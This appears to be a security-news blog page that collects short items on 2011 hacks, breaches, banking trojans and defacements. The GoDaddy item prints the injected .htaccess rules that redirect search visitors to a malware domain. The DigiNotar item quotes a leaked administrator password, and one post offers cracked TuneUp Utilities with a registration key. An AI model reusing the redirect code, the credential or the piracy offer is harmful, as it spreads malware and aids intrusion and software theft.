USA Today Twitter Account Hacked By Script Kiddie

         A group calling itself “The Script Kiddies” hacked USA Today’s Twitter account this weekend and used it to solicit requests for future targets and even to promote its own Facebook page. Although this recent hack seems like more of a childish prank, this group is being taken seriously by the FBI due to its earlier hacks involving false terrorism claims posted to NBC’s Twitter account.

           USA Today quickly regained control of the compromised feed. "@usatoday was hacked and as a result false tweets were sent. We worked with Twitter to correct it. The account is now back in our control," it said. "We apologize for any inconvenience or confusion caused to our readers and thank you for reading @usatoday."

           It’s possible that the new USA Today hack involved a spyware Trojan horse, like the earlier NBC hack did. For the NBC hack, NBC News’s director of social media Ryan Osborn could have received a Trojan horse containing a keylogger via email, which then captured passwords as they were typed into his computer.

           The Facebook page allegedly operated by the Script Kiddies is still live, but their @script_kiddiez_ Twitter feed has been suspended.

Read More

Atlanta IT Worker Hacked Ex-Employers Database

          An Atlanta man could receive up to five years in prison after pleading guilty Wednesday to hacking into a former employer’s patient database, stealing information and then wiping the database clean. Federal prosecutors said Eric McNeal, 37, used the patient information from a firm identified as “A.P.A.” for a direct marketing campaign at his new employer in the same building. McNeal was an information technology specialist for the perinatal medical practice in Atlanta in November 2009 when he left to join the competing perinatal practice.

           McNeal used his home computer to hack into his former employer in April 2010, prosecutors said in a release.He downloaded patients’ names, addresses and telephone numbers and then cleared his former employer’s database, deleting all patient information from its system, prosecutors said. While he used the information for a direct-mail marketing campaign for the benefit of his new employer, there was no evidence McNeal misused the personal information he obtained, prosecutors said.

Read More

50000 WordPress Sites infected with spam

          The attack consists of contacting the domain wplinksforwork.com to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days and all the sites compromised. These sites supposed to be compromised. Most of the hacked sites had outdated versions of WordPress installed.

Infected sites have following message at Footer :
Warning: file_get_contents(http://wplinksforwork.com/56132.. 47509328/p.php?host=… failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in ..

Read More

Mac trojan poses as PDF to open botnet backdoor

          There's another Mac OS X Trojan out in the wild, and it might be heading your way.If you open the file, which could appear as an emailed attachment or as a Web link, the document, written in traditional Chinese ideograms, does indeed display. But a Trojan silently installs itself in the background as you try to sort out centuries-old territorial claims.The Trojan doesn't really do anything yet. But F-Secure, the Finnish security firm that discovered it, notes that it lays the groundwork for much more sophisticated attacks against Macs.

           The malware in question has been identified as Trojan-Dropper:OSX/Revir.A, which installs a backdoor, Backdoor:OSX/Imuler.A, onto the user's Mac. Currently, however, the backdoor doesn't communicate with anything. The command-and-control center for this particular malware is apparently a bare Apache installation, which has been sitting at its current domain since May of this year. Because of this, users who might fall victim to this attack aren't likely to see many ill effects for the time being, but that could change if the files end up spreading to a wider audience.

           Usually, backdoors are employed to communicate with a remote command-and-control (C&C) server, which is capable of instructing the payload to siphon off data from the infected computer back to the attackers. However, F-Secure found that the C&C server is a bare Apache installation, not yet capable of communicating with the backdoor.

Read More

75 Indian Govt and University Sites hacked including Patiala Police by Muslim Liberation Army

 

          Muslim Liberation Army hackers today hack 75 more Indian websites , Including Govt. and Universities sites and also Police websites. Patiala Police website is one of the target of hackers. List of all hacked sites is here. hackers are : XtReMiSt, KillerMind Haxor, Jerry Hassan, Mindy, Faisy Ali Laghari , according to deface  page.

Read More

Harvard University website hacked by Syria protesters

          Syrian hackers have hit the website of Harvard University, one of America’s top universities, Itar-tass reports. Along with a picture of Syrian president, Bashar al-Assad, the hacked home page showed a message saying the "Syrian Electronic Army Were Here".

           "The university's homepage was compromised by an outside party this morning. We took down the site for several hours in order to restore it. The attack appears to have been the work of a sophisticated individual or group," said a Harvard spokesman. They also criticized US policy towards President Assad`s regime and wrote several threats to the US. The new design stayed on the website for nearly an hour.

Read More

700,000 InMotion Websites Hacked

          InMotion's data center got hit by the hacker that calls himself TiGER-M@TE, leaving a few hundred thousand website owners with nonfunctional pages. He is also the one responsible for the attack carried out on Google Bangladesh.

          “At around 4am EST, our system administration team identified a website defacement attack affecting a large number of customers. We are still investigating, but it appears that files named index.php have been defaced,” InMotion representatives said. He claims to be working alone, his modus operandi narrowing to private exploits and zero-day attacks.

         "I hack 700000 websites in one shot, this may be a new world Record. After submitting 200,000 domains,zone-h was going down again and again and became almost unresponsive in the end.so i was unable to submit all websites.so i've listed all domains in attachment. It was not just a server hack, actually whole data center got hacked," the cybercriminal revealed.

           It seems that he didn't do much harm to the websites, only replacing the index file on each with his own. The hosting company has already started the repair process, guiding members who possess the necessary knowledge to make the repairs themselves. “If you have a backup of your site, you may upload your index.php files to correct this. You may need to do this for each directory. If your site uses an index.html or index.htm, you will need to upload those files, then delete the index.php,” a press release stated.

           After a few hours the company successfully restored 65% of the affected pages, urging users to refresh their browsers if they're still viewing the hacked site. At the time of this writing, most repairs should be done by their automated system, the remaining issues being addressed in the upcoming days. Customers who see a directory listing instead of their website are advised by InMotion to upload a backup copy to their domain host.

Read More

Over 70% of small businesses not tested their websites for cyber security: Survey

          Over 70% of small businesses (SBs) in the US have not tested their websites for cyber security, while 27% of business owners have had an outside party to test their computer systems to ensure they are hacker proof, according to SB Authority Market Sentiment Survey by Newtek Business Services.

          Based on the poll of approximately 1,200 respondents, the survey found that 39% of business owners do not have their data backed up in more than one location. With recent breaches of security at Citi Bank, Sony and The Pentagon, small business owners should be concerned and take precaution to ensure their confidential business information is protected.

          The survey demonstrates that very few business owners have taken a necessary precaution of having a professional data security firm perform a current assessment of vulnerabilities on their commercial website or database applications.

          The survey found that 65% of business owners seem unaffected by natural disasters, while 61% seem to think their data is backed up in multiple locations. "We believe that small to medium sized business owners need to review all aspects of their data security and disaster recovery efforts," Sloane said.

Read More

Over 200,000 Britons victims of online romance frauds: Soca

          Soca warned in the report that online dating scams are growing and the crime watchdog has warned people to be careful of emails or messages that have romantic overtures in them. Soca said that the study found that cyber criminals pose as would-be romantic partners on dating sites and dupe people after taking money from them. Such criminals have a fake online identity, found the study.

          Soca said in a statement, "Fraud is not a victimless crime and romance fraud is just one example of how devastating fraud can be to men and women. Romance fraudsters target people who use internet dating, social web sites and newspaper personal columns. By feigning romantic interest romance fraudsters first secure their victims' trust then exploit the relationship to steal personal information and money, leaving their victims financially and emotionally devastated."

         The study found 2% of people surveyed personally knew someone who had experienced an online dating scam. The figure translates into over 200,000 potential victims of the total online UK population. Soca estimates that the number of unreported cases are likely to be far higher as individual losses range from £50 to £240,000. Moreover, such frauds mostly go unreported.

          Leicester University psychologist and professor of contemporary media Monica Whitty said there could be many more victims in the survey as people often learn late that they have been duped in such scams. "A lot of people find it very hard to accept what has happened, even if they know the person involved is now in jail," Whitty said. Whitty added that targets were from both genders and all age groups."We've had male victims who still refer to the other person as 'she', even though they now know it was a man. In a few cases they've found the relationship so therapeutic they keep it going, even if they know they've been conned."

          "The perpetrators spend long periods of time grooming their victims, working out their vulnerabilities and when the time is right to ask for money," he said. "By being aware of how to stay safe online, members of the UK public can ensure they don't join those who have lost nearly every penny they had, been robbed of their self-respect, and in some cases, committed suicide after being exploited, relentlessly, by these criminals."

Read More

Underground Radar: Possible Compromise of MySQL.com and its Subdomains

         We recently found an interesting post in a Russian underground forum in the course of our research. People exchange information about their illegal activities in these kinds of forums. We found a user in the forum with the handle ‘sourcec0de‘ and ICQ number ’291149′ who is currently offering root access to some of the cluster servers of mysql.com and its subdomains.
          The screenshot above shows that the seller appears to have a shell console window with root access to these servers. The price for each access starts at $3,000 USD, with the exchange of money/access being provided by the well known garant/escrow system, whereby a trusted third party verifies both sides of the transaction.

          In our previous underground research, we have also seen the user ‘sourcec0de’ selling stolen PayPal accounts and discussing the management of botnet command and control servers. We contacted MySQL.com about this issue last week. We are making this public to stress the fact that hackers do not only profit from selling stolen data or by inserting bad links into spammed or phishing messages, websites and other possible infection vectors.

          In this case, whether sourcec0de‘s claim is true or not, it shows how cybercriminals are so brazen as to sell admin access to specific systems, which could be negatively impacted by their break-ins.

Read More

TuneUp Utilities 2011 : Full Version with Registeration Key

TuneUp is an Awesome Windows Tweaking and Performance Enhancement tool
There are hundreds of free trials available over the wire..
But PC Sneakers don't believe in Free Trials... ;)
So herez the full version for you...
Installation and Activation Instructions in the Readme file...
So Download the Archive, Extract and enjoy..

Download Securely from Here [18.85Mb]

Read More

Intelligence and National Security Alliance (INSA) hacked

          On Wednesday, 48 hours after releasing a policy paper on cybersecurity, the top trade association for intelligence contractors got a first-hand lesson on the subject: they discovered that their website was hacked.

           Cryptome, a site affiliated with the hacker collective Anonymous, published the membership emails and phone numbers and in some cases home addresses for the members of the Intelligence and National Security Alliance (INSA). By clicking on a link titled, “INSA Nest of Official and Corporate Spies,” anyone can find contact information for senior officials at the NSA, FBI, and CIA, as well as top national security contracting firms like Booz Allen Hamilton.

           The apparent cyberattack on the Intelligence and National Security Alliance, or INSA, is the latest example of the ability of hackers to penetrate the computer systems of government agencies and private companies — including those that pride themselves on their savvy and expertise in cybersecurity.

INSA is only the latest example of how the intelligence community and its affiliated contractors have been hacked by increasingly brazen hackers. On July 11, Anonymous published some 90,000 emails and login credentials for U.S. military officers after breaking into the servers of Booz Allen Hamilton. The group published the data on a website called Pirate Bay and announced on Twitter that July 11 was “Military Meltdown Monday.” The month before, another group of hackers called “LulzSec” (who claim to have since disbanded) published internal files from the FBI and claimed to briefly disable the CIA’s public website.

"Due to the nature of our business, INSA takes security very seriously," McCarthy said in a statement. "We are outraged that someone finds it sporting to make private organizational data public, but we are not naïve. It is not a coincidence that this incident happened just two days after INSA's Cybersecurity Council released a report documenting the need for government and the private sector to begin to work together to solve our nations cyber security vulnerabilities."

Read More

Searching for Heidi Klum on Web could land you in hackers' net

          Movie stars and models top the list this year while singers and sports stars are among the safest in McAfee Most Dangerous Celebrities 2011. Searching for model Heidi Klum on the Internet carries a high risk of running into malware-fitted websites and other files such as photos, videos and screensavers, revealed Internet security company McAfee.

          Klum replaced actress Cameron Diaz as the most dangerous celebrity to search for on the Web in McAfee's Most Dangerous Celebrities study. It is a common ploy of cybercriminals to use the names of popular celebrities to lure people to sites that have malware hidden in photos, videos and other popular dowloading files.

           "Anyone looking for the latest videos or pictures could end up with a malware-ridden computer instead of just trendy content," said McAfee. The McAfee study is in its fifth year in a row. McAfee researched most famous people to find the riskiest celebrity athletes, musicians, politicians, comedians and Hollywood stars on the Web. The study revealed that movie stars and models top the "most dangerous" list this year while singers and sports stars are among the safest.

          The McAfee study found that searching for the latest Heidi Klum pictures and downloads yields more than a 9% chance of landing on a website that has tested positive for online threats, such as spyware, adware, spam, phishing, viruses and other malware. The security company said that "fans searching for 'Heidi Klum' or 'Heidi Klum and downloads,' 'Heidi Klum and 'free' downloads,' 'Heidi Klum and photos' and 'Heidi Klum and videos' are at risk of running into online threats designed to steal personal information."

          "Clicking on these risky sites and downloading files like photos, videos or screensavers exposes surfers or consumers to the risk of downloading the viruses and malware," added McAfee. The study also found that Tennis stars Maria Sharapova and Andy Roddick, who came in at No. 13 and No. 14 respectively last year have dropped to No. 44 and No. 56 on this year's list. Singer Justin Bieber was No. 49 this year, followed by Rihanna and Carrie Underwood who were tied at No. 51, and Lady Gaga was No. 58, said McAfee.

Read More

ClickIndia Classifieds network hacked by Sec Indi

          Sec Indi Security Team have found Multiple major flaws on Clickindia.com - One of the biggest Classifieds network. There is a highly possible chance to damage ClickIndia system or to steal the Database. Hackers Exploit it via SQL Injection Vulnerability.

Read More

SpyEye Trojan stole $3.2 million from US victims,Android users will be next target !

          A Russian cybergang headed by a mysterious ringleader called ‘Soldier’ were able to steal $3.2 million (£2 million) from US citizens earlier this year using the SpyEye-Zeus data-stealing Trojan, security company Trend Micro has reported and Trusteer reports that an Android variant of Spitmo (SpyEye for mobile) has been discovered. The methodology sounds familiar for those familiar with ZeuS Mitmo and SpyEye Spitmo: infected computers inject a message into targeted netbanks prompting their customers to install software on their phones. Once Spitmo is installed, the SpyEye attacker is able to monitor incoming SMS and to steal MTAN authentication messages.

           "His botnet was able to compromise approximately 25,394 systems between April 19, 2011 and June 29, 2011. And while nearly all of the victims were located in the US, there were a handful of victims spread across another 90 countries," it said in a blog post.

          Over a six month period from January 2011, Trend found that the Soldier gang had been able to compromise a cross-section of US business, including banks, airports, research institutions and even the US military and Government, as well as ordinary citizens.A total of 25,394 systems were infected between 19 April and 29 June alone, 57 percent of which were Windows XP​ systems with even Windows 7 registering 4,500 victim systems.

          “Compromise on such a mass scale is not that unusual for criminals using toolkits like SpyEye, but the amounts stolen and the number of large organizations potentially impacted is cause for serious concern.”

 

Victims included: US Government (Local, State Federal)

• US Military
• Educational & Research Institutions
• Banks
• Airports
• Other Companies (Automobile, Media, Technology)
• C&C Infrastructure

          Banking Trojans such as SpyEye and the older Zeus (possibly now merged with SpyEye) have been one of the malware stories of the last year, and have featured in a number of high-profile online crime cases.

          Zeus for Android purports to be a version of Trusteer Rapport security software. This social engineering trick is used in an attempt to convince the user that the application they are installing is legitimate.SpyEye for Android, now detected by Sophos products as Andr/Spitmo-A, uses a slightly different but similar social engineering technique.

          Spitmo was initially detected by F-Secure in April when a variant was used in an attack against a European bank - the Trojan added question fields to the bank's website, asking customers to enter their mobile phone number and the device's IMEI.Sean Sullivan, security advisor at F-Secure, said: “Spitmo.A contains the malicious executable (sms.exe) and another installer, which contains an executable named SmsControl.exe. SmsControl.exe will just display the message ‘Die Seriennummer des Zertifikats: Ü88689-1299F' to fool the user into thinking that the installer was indeed a certificate.“The name SmsControl.exe is quite a coincidence, as a variant of ZeusMitmo used the same name for the file containing the Trojan. Faking the Trojan to be a certificate is also a trick that ZeusMitmo has used. However, the code itself looks completely different than in ZeusMitmo.”

Read More

Balaji Plus Cloud Antivirus Released - Mix of 32 antivirus Engines for ultra Protection

           Leo Impact Launch World first Antivirus scanning software which protects your PC from viruses, trojans, spyware, rootkits and other malicious programs (zero day exploits) by using 32+ antivirus on cloud. Most of time you can install and use only 2 to 3 antivirus in one system, not more so virus author bypass top antivirus but Balajiplus is Free service by Leo impact Security for Corporate Social Responsibility to protect your digital life using multiple antivirus scanners on cloud. Collective Intelligence, Balaji Antivirus Plus proprietary cloud-scanning technology that automatically collects and processes millions of malware samples, lies at the core of Balaji Cloud Antivirus. In recent comparative tests conducted by both AV-Test.org and AV-Comparatives.org, Balaji Antivirus Security's detection and protection scores rank consistently amongst the top security solutions.

Balajiplus Cloud scanner use following Latest 32+ antivirus engine
Ad-Adware
ArcaVir
Avast
AVG Anti-Virus
Avira AntiVir Personal
BitDefender Internet Security
BullGuard
VirusBuster Internet Security
ClamAV
COMODO Internet Security
Dr.Web
CA Internet Security
F-PROT Antivirus
F-Secure Internet Security
G Data InternetSecurity 2011
IKARUS Security Software
Kaspersky Internet Security
McAfee Total Protection
Microsoft Security Essentials
ESET NOD32 Antivirus
Norman Security Suite
Norton Internet Security
Panda Cloud Antivirus
Quick Heal
Rising AntiVirus 2011
SOLO ANTI-VIRUS
Sophos AutoUpdate
Trend Micro Internet Security
VirusBlokAda
Vexira Antivirus Scanner
Webroot Internet Security
Zoner AntiVirus client

Why Balaji plus is unique/Safe?

• Trusted by Trustwave and verisign
• Online scanning module so no need to install any program in your system
• Totally free and Anonymous (your exe and attachments auto deleted and never shared with antivirus companies)
• Its better than install & use one antivirus instant Muliple 32+ antivirus scanning using our cloud technology.
• This is ver 1.1 and we will launch ver 2.1 engine soon in next 2 months with patent patending technology so No virus /RAT./ Trojan infection's on your system

Visit us : http://balajiplus.com

Read More

GoDaddy websites Compromised with Malware

          Many sites hosted on GoDaddy shared servers getting compromised today  with a conditional redirection to sokoloperkovuskeci.com. In all 445 cases the .htaccess file (a main Apache web server configuration file) was modified to redirect users to a malware site when they were referred by one of a list of search engines. These redirections attacks are very common on outdated WordPress and Joomla sites, but this time (and for this specific malicious domain), we are only seeing them on GoDaddy hosted sites. So it looks like a compromise on their own servers (similar to what has happened in the past).

          This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

           The malware checks if anyone visiting the infected site is coming from a Google search (or Yahoo, or Bing) and if they are, redirects them to that domain (sokoloperkovuskeci.com). In there, the user gets redirected again to other locations to get their browsers infected too. So you have to fix your site asap to protect your own users.

          GoDaddy says they are working with customers to resolve the issue, but if you have a GoDaddy account you should check on this, minimally by Googling for your site and following the link (only if your browser is all patched up and you have sufficient other protections).DomainNameWire also smartly recommends that you check with Google, other search engines and security companies to make sure you haven't been blacklisted.

Read More

New Internet banking Trojan identified..!! :-(

          'Shylock' targets UK banks by modifying traffic while an online transit is on, says Trusteer. Security company Trusteer has discovered a new Internet banking Trojan targeting the customers of around six UK banks.

          The security company, which supplies its Rapport security product to several UK banks, including HSBC, RBS and Santander's UK operations, said that the malware Trojan attacks by sitting silently on the browser and monitoring online transactions, according to SearchSecurity. The malware makes use of clever new techniques to avoid detection and removal.

          Trusteer has dubbed the malware as 'Shylock' -- a Shakespearian moneylender in Shakespeare's Merchant of Venice. Shylock famously demanded his "pound of flesh" from the protagonist as an alternative to clear an unpaid debt. Trusteer said that the malware first gets installed in banking customer's Internet browser. As soon as the Trojan detects an online banking session, it alows a hacker to steal login information, and also modify the traffic between the bank and the customer.

          "Shylock sits in the browser. It can passively monitor the user's traffic, or it can modify the traffic in transit," said Trusteer CTO Amit Klein. "For example, if you log into a targeted bank, it can record your login information, it can record the contents of the page returned from the bank's Web server - such as your bank balance - or it could modify the page before it is rendered on the screen," Klein added.

Read More

Typo errors in email addresses could land corporates in hackers' net

          Sophos researchers capture 120,000 emails intended for Fortune 500 companies by exploiting a basic typo such as "missing dot". Basic typo errors in email addresses could be exploited by hackers to gather sensitive information such as trade secrets of corporates, according to computer security company Sophos.

          Security researchers found in a probe that cyber thieves could exploit typo errors such as a missing dot in an email address to grab as much as 20GB of data made up of 120,000 wrongly sent messages over a period of six months. Companies use dots to separate the words in a sub domain. And usually a message bounces to the sender if an address is typed with one of the dots missing. However, researchers managed to net such emails by setting up similar doppelganger domains.

          Web consultant Mark Stockley wrote on the blog of Sophos that it is striking that the researchers managed to capture so much information by focusing on just one common mistake. "A determined attacker with a modest budget could easily afford to buy domains covering a vast range of organisations and typos," he said. The company revealed that researchers have captured 120,000 emails intended for Fortune 500 companies by exploiting a basic typo. The emails included trade secrets, business invoices, personal information about employees, network diagrams and passwords.

          Researchers Peter Kim and Garrett Gee did this by buying 30 Internet domains they thought people would send emails to by accident. The practice is known as typosquatting said Stockley. The domain names they chose were all identical to subdomains used by Fortune 500 companies - including Dell, Microsoft, Halliburton, PepsiCo and Nike -- save for a missing dot. Users mistakenly sent them over 120,000 emails in six months. Stockley revealed that emails thus collected included "some worryingly sensitive corporate information, including: passwords for an IT firm's external Cisco routers; precise details of the contents of a large oil company's oil tankers; and VPN details and passwords for a system managing road tollways."

          The researchers warn that such typosquatting could be easily turned into an even more dangerous man-in-the-middle attack. Such an attack would have allowed them to capture entire email conversations rather than just individual stray emails, said Stockley. He said, "To perform a man-in-the-middle attack an attacker would simply forward copies of any emails they receive to the addresses they were supposed to go to in the first place. The forwarded emails would be modified to contain a bogus return addresses owned by the attacker. By forwarding and modifying emails in this way the attacker establishes themselves as a silent rely between all the individuals in the conversation."

Read More

Linux Foundation & Linux.com multiple server compromised

          The Linux Foundation has pulled its websites from the web to clean up from a “security breach". A notice posted on the Linux Foundation said the entire infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are down for maintenance due to a security breach that was discovered on September 8, 2011.

           Multiple Servers that are part of the Linux Foundation & Linux.com infrastructure were affected during a recent intrusion on 8 September which "may have compromised your username, password, email address and other information". 

More from the Linux Foundation announcement:
           We are in the process of restoring services in a secure manner as quickly as possible. As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately. We are currently auditing all systems and will update this statement when we have more information.

           We apologize for the inconvenience. We are taking this matter seriously and appreciate your patience. The Linux Foundation infrastructure houses a variety of services and programs including Linux.com, Open Printing, Linux Mark, Linux Foundation events and others, but does not include the Linux kernel or its code repositories.

           The kernel.org site is still offline after that compromise which was discovered on August 28th. The Linux Foundation's servers, linuxfoundation.org and linux.com, and services associated with them such as Open Printing, Linux Mark and Foundation events, are all offline while the administrators perform a complete re-install on the systems. In the meantime the Foundation is advising users to regard any passwords and SSH keys used on these sites as compromised, and they should be immediately changed if they were used on other sites.

Read More

NBC News Twitter account hacked & post fake news of 9/11

          Hackers have broken into the Twitter account of NBC News and posted messages claiming that there has been a terrorist attack at Ground Zero in New York. Coming two days before the tenth anniversary of the 9/11 attacks, the prank by a group calling themselves the 'script kiddies' was greeted with widespread opprobrium from other twitter users.

          "Breaking News! Ground Zero has just been attacked. Flight 5736 has crashed into the site, suspected hijacking. More as the story develops," was the first tweet this afternoon. It was followed by two others, including one that started "This is not a joke." The fourth tweet said "NBCNEWS hacked by The Script Kiddies."

          Luke Russert, who covers politics for NBC News, also tweeted: "Please ignore NOT TRUE tweets coming from @NBCNews. We got hacked by tasteless despicable attention seeking criminals." Some experts suspect that script kiddies, who are thought to have hacked a Fox News account two weeks ago, are British although this had not been confirmed.

Read More

Panda Security (Pakistan domain) hacked by X-NerD

          Panda Security, One of the famous Computer software company website got hacked. Pakistan domain of Panda Security hacked by Pakistani hacker "X-NerD". Hacker is from Pakistan Cyber Army team of hackers. Taunt by hacker on deface page "OoooOOPss...I am ShockeD At YouR SecuritY..S3cuR!tY L3vEL Z3r0...YOu Dont KnoW HOw To SecurRe Your AsS n Pr0vidinG SEcurity to 0therS...Big LauGh...".

Read More

uTorrent & BitTorrent Sites Hacked, Spread Security Shield Malware

           Attackers hijacked two popular Torrent websites "bittorrent.com and utorrent.com" and tampered with their download mechanisms, causing visitors trying to obtain file-sharing software to instead receive malware. The site reported on its blog that the attack had occurred at around 04:20 Pacific Daylight Time (11:20 GMT) on Tuesday. Initially, the incursion was also thought to have affected the servers of the main BitTorrent site, but further investigation revealed this site had been unaffected by the attack.

           Once installed, Security Shield delivers false reports that a computer is infected with multiple pieces of malware and prompts the user for payment before claiming to disinfect the machine. The attack affected only users who downloaded and installed software from bittorrent.com and utorrent.com during the hour-and-fifty-minute window that the sites were compromised. Those who installed software previously are unaffected.

           "We have completed preliminary testing of the malware. Upon installation, a program called ‘Security Shield" launches and pops up warnings that a virus has been detected. It then prompts a user for payment to remove the virus. " experts write on the blog.

           It is very important to once more note that infected are only users who have downloaded the software between 4:20 a.m. and 6:10 a.m. Pacific time. If you have previously downloaded it - you can rest assured your software is clean.

Read More

Hacker accesses 40,000 credit and debit cards processed by arcade vendor

      Vacationland Vendors, a Wisconsin-based supplier of arcade equipment and vending machines, said credit and debits cards used in its card processing system over a two and a half year period may have been exposed.

          Vacationland Vendors discovered that a hacker had gained unauthorized access to its card processing system at Wilderness Resorts in Wisconsin and Tennessee and had access to credit and debit cards processed by its arcade point of sale system from Dec. 12, 2008, to May 25, 2011.

          “Based upon its investigation to date, Vacationland Vendors reasonably believes that a computer hacker improperly acquired credit card and debit information. This incident did not involve an internal security issue within the Wilderness Resort. Vacationland Vendors has learned that other businesses just like its own have been affected by this computer hacker.”, the company said on its website.

          The company said it is working with an outside consultant to ensure its card processing systems are secure and protected from further hacking, but it did not indicate whether it was providing affected customers with credit monitoring services. The website announcement did not provide the number of people affected by the data breach, but news reports put the number at up to 40,000.

Read More

More than 7.8 million people were victims of healthcare data breaches, says HHS

           More than 7.8 million people had their healthcare information compromised in 252 major data breaches during a 15-month period in 2009 and 2010, according to a recent report to Congress by the Department of Health and Human Services (HHS).

          About half of the major breaches affecting more than 500 people were the result of theft, including stolen electronic equipment such as network components, laptops or hard drives. The largest reported theft affected 1.9 million people, HHS said in its report. This involved the theft of back-up tapes that contained electronic medical records as they were being transported by a vendor to the vendor’s site.

          Of the 99 reported incidents of theft in 2010, 42 involved the theft of laptops. The majority of the incidents involved thefts of laptops onsite while a few incidents involved offsite theft, such as theft of a laptop from an employee’s car. Twenty-one incidents involved theft of desktop computers from onsite locations.
Fourteen incidents were reported as theft of “portable electronic device/other”, which were predominately stolen smartphones and flash drives. Finally, seven incidents were reported as thefts of more than one device, such as a laptop and a desktop computer or a desktop computer and network drive, and five incidents involved theft of a network server.

         Other reported data breach incidents involved intentional unauthorized access to, use, or disclosure of protected health information; human error; loss of electronic media or paper records containing protected health information; and improper disposal of records.

          The HHS report looked at data breaches that occurred between Sept. 23, 2009, when notification requirements under the Health Information Technology for Economic and Clinical Health Act (HITECH) Act went into effect, and Dec. 31, 2010.

Read More

Cybercrime costs rival those of illegal drug trafficking

          Young males in emerging markets are the most likely to fall victim to cybercrime, whose total cost per year is approaching the scale of illegal drug trafficking worldwide, according to a study by the Norton division of Symantec.

          The 2011 Norton Cybercrime Report estimates the total cost of cybercrime at $388 billion per year, which includes $114 billion in direct theft and time spent resolving attacks plus another $274 billion for productive time victims lost due to cybercrimes being committed against them. In all, 589 million have been affected by cybercrime, 431 million of them in the past 12 months, the report says. The study the report is based on was carried out in 24 countries and included 19,636 interviews.

          The report says that compares to global drug trafficking, estimated at $411 billion. Cybercrime already surpasses the total of black market marijuana and cocaine sales, Norton says, which totals $288 billion.
The most common form crime takes is viruses and malware, with 54% experiencing them, followed by online scams (11%) and phishing (10%). Norton measured mobile phone crime and found that 10% fell victim, including smishing - phishing by SMS.

          Tracking in all 24 countries, the company found that 1 million people per day became victims of cybercrime. The more time individuals spend online, the more likely they were to be hit. Of those spending 49 hours online per week, 79% were victims, while the number was 64% for those who spent 24 hours or less online.

          Those numbers are three times higher than the number of victims of physical crimes. Nevertheless, Norton notes that 70% of those surveyed thought they would be safer online than in the real world over the next 12 months. Some of the problem is preventable, Norton says, noting that 41% of adults don't have updated security suites on their computers.

Read More

Sony Hires Ex- Homeland Security Official after PlayStation Hack

Sony has hired a former official at the US Department of Homeland Security (DHS) for the new post of chief information security officer, months after a massive hacking attack leaked information on 100 million user accounts on its games networks.

Philip Reitinger, formerly the director of Homeland Security's National Cyber Security Center, will join Sony in the newly created position of chief information security officer and a senior vice president.

The new hire signals a heightened seriousness by Sony in the aftermath of an intrusion into its online videogame service earlier this year. The breach compromised the personal information of more than 100 million accounts from its online networks, including the possible loss of some credit card information. Sony said there have been no reports of any credit card data theft. Sony shut down the PlayStation Network and Qriocity streaming video and music network on April 20, keeping the services offline for nearly one month. It took until July 4 for the services to be fully restored globally.

Nicole Seligman, a Sony executive vice president and the company's general counsel and corporate executive officer, will be Reitinger's boss.Reitinger has also worked for the Department of Defense and the Department of Justice and holds a law degree from Yale, Sony said.

Read More

20000 patient records Breach at Stanford Hospital

 

           Last month Stanford University's hospital discovered a massive privacy breach when 20,000 emergency room records appeared online. The records included names, diagnosis codes, account numbers, dates of admission and discharge, and billing charges. Social Security numbers, birth dates, credit card accounts or other information that could potentially result in identity theft was not exposed. Even so, the hospital is offering free identity-protection services to all affected patients.

 

The Hospital released the following statement:
           "An electronic file that an outside vendor’s sub-contractor created and caused to be posted to a website contained limited information about patients seen in the Emergency Department of Stanford Hospital & Clinics between March 1 and August 31, 2009. The Hospital discovered this on August 22, 2011, and immediately took action to ensure removal of the file from the website, which was done within 24 hours. 

           A full investigation was launched, and Stanford Hospital & Clinics has been working very aggressively with the vendor to determine how this occurred, in violation of strong contract commitments to safeguard the privacy and security of patient information. The vendor, Multi Specialties Collection Services, is conducting its own investigation into how its contractor caused patient information to be posted to the website and the Hospital may take further action following completion of the investigation. 

           Information in the electronic file was limited to names, medical record numbers, hospital account numbers, emergency room admission/discharge dates, medical codes for the reasons for the visit, and billing charges. Information commonly associated with identity theft, such as credit card and social security numbers, was not included.
 
           The Hospital is strongly committed to protecting our patients’ information and immediately suspended work with the vendor. The Hospital notified affected patients quickly and also arranged for free identity protection services, though the data involved is not associated with identity theft.
This incident was not caused by the Hospital, and responsibility has been assumed by a contractor working with the vendor.

Read More

ComodoHacker responsible for DigiNotar Attack

          The hacker warns the Internet community that he has access to 4 other high-profile CAs, among them being GlobalSign, a certification authority from the U.S. He threatens that he will use his power over the companies to issue false certificates, which will later become the weapon of his revenge against countries who deserve it.In his own words, he said “I won't talk so many detail for now, just I wanted to let the world know that ANYTHING you do will have consequences, ANYTHING your country did in past, you have to pay for it...”. Complete Message here.

           As a proof to show that he really did infiltrate DigiNotar, he shares the domain administrator password of the CA network:Pr0d@dm1n .

           Around 300.000 unique requesting IPs to google.com have been identified," Fox-IT said in the report. On Aug. 4 the number of requests rose quickly until the certificate was revoked on Aug. 29. Of these IP (Internet Protocol) addresses, more than 99% originated from Iran.The list of IP addresses will be handed over to Google who can inform users that their e-mail might have been intercepted during this period, Fox-IT said.

          According to SC Magazine, Microsoft has also updated the Certificate Trust List (CTL) to remove any fake certificates. A total of 531 digital certificates were issued for domains that included google.com, the CIA, and Israel's Mossad . The hack implies that the current network setup and procedures at DigiNotar are not sufficiently secure to prevent this kind of attack.

Read More

Researchers develop botnet drone that targets Wi-Fi networks

